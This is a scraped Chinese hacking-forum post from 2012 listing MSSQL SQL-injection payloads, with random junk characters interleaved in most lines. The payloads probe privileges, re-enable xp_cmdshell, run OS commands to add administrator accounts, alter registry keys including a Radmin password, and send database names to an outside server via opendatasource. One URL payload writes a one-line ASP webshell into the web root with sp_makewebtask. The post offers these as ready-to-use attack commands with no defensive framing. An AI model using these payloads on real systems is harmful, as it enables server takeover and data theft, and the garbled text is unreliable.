找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2057|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的& \6 I5 ?( L* l  K  Y: T
and 1=(Select IS_MEMBER('db_owner'))4 u0 J7 T" y7 h: o8 N5 Z
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--: g1 m; `& O$ }2 a9 p; i

1 v2 [2 o, v8 p//检测是否有读取某数据库的权限
( M  N( n; U( cand 1= (Select HAS_DBACCESS('master'))
% k7 R1 b& ~/ @And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --7 D  o* E, o3 q4 Q( q

" ^! p, F5 `7 O8 R- i$ {) R+ a7 s% ^) h; d( b8 c! _
数字类型4 O. [$ g; t$ I7 ^( K# p4 l. Q
and char(124)%2Buser%2Bchar(124)=0* q5 {" ]" U' `8 L# h) J* _

" n: g2 j  s. F* e7 H) _字符类型
2 S5 F# k" C, t0 l4 H: k' and char(124)%2Buser%2Bchar(124)=0 and ''='
% V- |8 k2 S; G9 d) n* ^
7 L* Z- e7 p# b1 }( n搜索类型& B% |( g% U' C& F2 a
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
. n4 f2 ^* b9 h9 ~. D6 l- Q
% X1 M! x: B4 ]/ Q8 c  ?爆用户名
1 w$ b0 V0 {3 t2 p# s3 Zand user>0
5 o. ]( Z5 L( v, p1 w& s$ |' and user>0 and ''='0 g1 z2 r; [5 E6 h6 N& F* Z

2 e; H. T  U  a+ l1 ^: ~) q& x检测是否为SA权限
1 b7 G9 O9 {. Kand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
! O/ n, a# p; w, y" F1 DAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
* ^8 L, K% \. Z6 R: ^/ h% P: f. G- ?7 c  A8 a6 n) c! F9 _1 D% H
检测是不是MSSQL数据库+ k: O# Q9 N- B
and exists (select * from sysobjects);--4 }/ _5 l& ~1 z2 z4 o5 x
3 l# n- v4 e9 u4 T2 h: ^) g! n, B
检测是否支持多行# u5 K% h3 Q, T+ c' q0 j4 \. {
;declare @d int;--
! v2 L7 ~7 i, g
3 Z) H6 L9 I6 P* J5 o恢复 xp_cmdshell  }6 Q" b8 C- E. W
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--" [, T. N: j" ~) r) E! X$ n" @

  R& r. I, r$ V$ ]2 @  \9 a; ^1 v5 K/ f
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
5 b1 v0 f- l0 Y2 ?. v% w) ^( I. @0 g3 R2 N  J) S' v
//-----------------------9 H5 o3 L4 ]6 \- [
//       执行命令
0 h- x' M2 r4 g# C* T//-----------------------
+ {0 L* f- `; s8 I首先开启沙盘模式:0 o0 ]% `) a' u9 x" |
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',19 F- {8 O& r" n4 P+ X+ ]9 P' E

9 g) f3 s3 ^* A3 Z, U然后利用jet.oledb执行系统命令
7 a: S4 S+ y2 G  Z. I7 Eselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
% A, H  F' h# ^6 h6 P, c0 I/ V& v6 J) y
执行命令
+ m* z. Y4 z" `# [( _;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
+ t, k8 n% d2 y8 \8 y0 y& ]7 I' C& s4 ^
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111': L; ]  Q5 U' Z  o( H. L9 q( p

2 Q* F) T" ]" C# f判断xp_cmdshell扩展存储过程是否存在:
# a% m$ _* X6 c; `% E/ Lhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')( T  t( ]# X% B1 P% N8 o

0 j2 p9 [" }' y' Y7 _' u写注册表, h7 S3 j$ e) A/ M1 q
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 D  R# w. i2 H8 _) ?0 s5 b5 P! ~* g$ ^$ e/ a; ^1 `" |
REG_SZ' t5 v& q+ B, Q) w; d0 I1 S
5 s2 i+ ^6 i8 A6 Q- r* v$ X
读注册表
/ s4 f5 b5 J( C1 c2 Q/ }exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
" g' P. W7 a4 j6 h2 Z8 i
! d5 H8 @0 D: b6 O' K读取目录内容7 A+ i$ |7 c7 M
exec master..xp_dirtree 'c:\winnt\system32\',1,1
/ T$ \3 T, d" M# y4 g5 j+ t9 \: C8 o9 c
# g8 p! P5 A0 M  {
数据库备份* E' D( ~# B* N9 U+ v: j  R
backup database pubs to disk = 'c:\123.bak'" P8 q; q2 I( P3 f& i

% j. p  j7 K! y//爆出长度
4 B2 f% j, e7 Z; d1 r2 [7 PAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
. Q  ^) l/ Z, Z3 R6 Z% r7 \
7 L3 `8 J% Z$ H6 c
1 e, t! Q; Z5 o$ L) T
9 l1 W4 w8 w; o6 i" E9 S) B更改sa口令方法:用sql综合利用工具连接后,执行命令:
9 ~: a  ~) `$ t+ u+ v" `exec sp_password NULL,'新密码','sa'
1 W* D4 ^- r+ m" Y6 B2 p8 |+ U/ \
添加和删除一个SA权限的用户test:
$ `) B# y% j. f' p0 p0 v! Z: \exec master.dbo.sp_addlogin test,9530772
% F' M/ S1 N& `& o$ aexec master.dbo.sp_addsrvrolemember test,sysadmin& D9 x3 }: D, e+ M' d% x0 @2 X' S
& U: u# S. U  _$ t5 l
删除扩展存储过过程xp_cmdshell的语句:' H' h8 {% O% d
exec sp_dropextendedproc 'xp_cmdshell'
1 A! ^: F& K. n4 `  P" u5 p
3 g1 i: r0 m0 E$ }" O, f添加扩展存储过过程5 j& ]+ K2 b" A" n- ?& U
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
9 [& y: R9 F0 T8 [GRANT exec On xp_proxiedadata TO public" n. Z2 o6 x: D( t1 U6 t  J, U6 p8 \/ C
" P/ @* U: i# m" g! F8 v
  P- ]6 y: R' R/ W* {1 C
停掉或激活某个服务。- Z. B6 E1 S9 x) Z( I5 E; T+ d1 e
: o# c5 G5 g4 ~6 q/ @1 S" }% z
exec master..xp_servicecontrol 'stop','schedule'
' ~$ ]! @# b! e' t% i4 Qexec master..xp_servicecontrol 'start','schedule'
6 |6 |& I; V& m) P0 e$ `
4 }/ b, F' a+ ?7 n% A' D3 ?) Ndbo.xp_subdirs* y* e1 t- X- B4 z

3 ]. Y% y3 Y9 o6 K只列某个目录下的子目录。
( T* \" P( \1 p' Y& T9 g1 txp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
' Q1 s/ Z5 ]% x; ^* e  J+ z, m' f5 B2 i0 m: H5 F( @
dbo.xp_makecab2 w! z$ e" o5 ~- ?* F3 v

% Q* g2 i" N- W. X将目标多个档案压缩到某个目标档案之内。
$ ]# B6 a8 K1 X1 h7 b5 D& z所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。. c8 J2 O) g3 l8 q8 |
- u7 k% }7 p+ [8 r8 ]0 P
dbo.xp_makecab- G/ \+ t  R! @$ l$ b5 I& [
'c:\test.cab','mszip',1,
' p- V. D$ f+ L% v, k'C:\Inetpub\wwwroot\SQLInject\login.asp',
$ d& t, ]! w, a( s, l. Y0 R'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'7 l8 k, J. l1 H. J4 `. R
* Q$ B+ ~' n2 h2 U4 E
xp_terminate_process
  q# Q1 o$ u: h* w% e1 \7 R
6 c! P3 P+ `6 u$ C8 b' u停掉某个执行中的程序,但赋予的参数是 Process ID。& D3 i+ Z0 b: U
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
# h0 U, }0 \7 r) T: z: h; g6 }3 v. x# l8 N$ G' T
xp_terminate_process 24845 f3 p! L; A7 Q

" |, y: V9 V* t% xxp_unpackcab
, }- A7 L: E* ?5 _; Z. a
3 s% u3 w' R1 A' Q+ \1 V7 J解开压缩档。
( _5 D, R8 e7 U4 U
, o0 c! ], c- ]2 oxp_unpackcab 'c:\test.cab','c:\temp',1- X8 _6 d! S* r1 H& @

& B5 T. a7 h5 u# s' M$ b8 K1 F* I$ N2 i- E; B
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234/ V+ Z: t: T1 K+ A$ L

2 g- O) j* Q% v* ~# Fcreate database lcx;9 Q! ?8 T0 P) t& {' [5 v
Create TABLE ku(name nvarchar(256) null);
' f; j1 \, m5 aCreate TABLE biao(id int NULL,name nvarchar(256) null);
- ^2 z, I% {3 u5 s. E4 T8 g$ L" F: Y) U
//得到数据库名' [5 r1 T* T  h$ b' t, B
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases2 c$ \4 v* t! _' E) }, E9 f

$ K9 L; ?# ^2 |) D) D* t% U$ T, i
& M7 V# J/ {+ ^, S1 a( ]% ~2 o//在Master中创建表,看看权限怎样1 n+ R4 _. ^% t* Y. o) [# ~
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--2 V( I0 p2 i5 h# o/ U

* o3 m+ y' \1 g: F2 _. |6 @0 F用 sp_makewebtask直接在web目录里写入一句话马:
% \% f0 s0 V' o  ]$ a: P6 Hhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--. J5 k/ p! |/ D" C7 l5 \! m
, F' @7 q3 u7 |
//更新表内容- A2 b# k& J, E* L! h% p
Update films SET kind = 'Dramatic' Where id = 123
, r7 ]# H2 C; V& n6 T: |" ?4 o
$ ?9 b3 c) Z; f: j//删除内容
% ~; w7 M; @: {delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表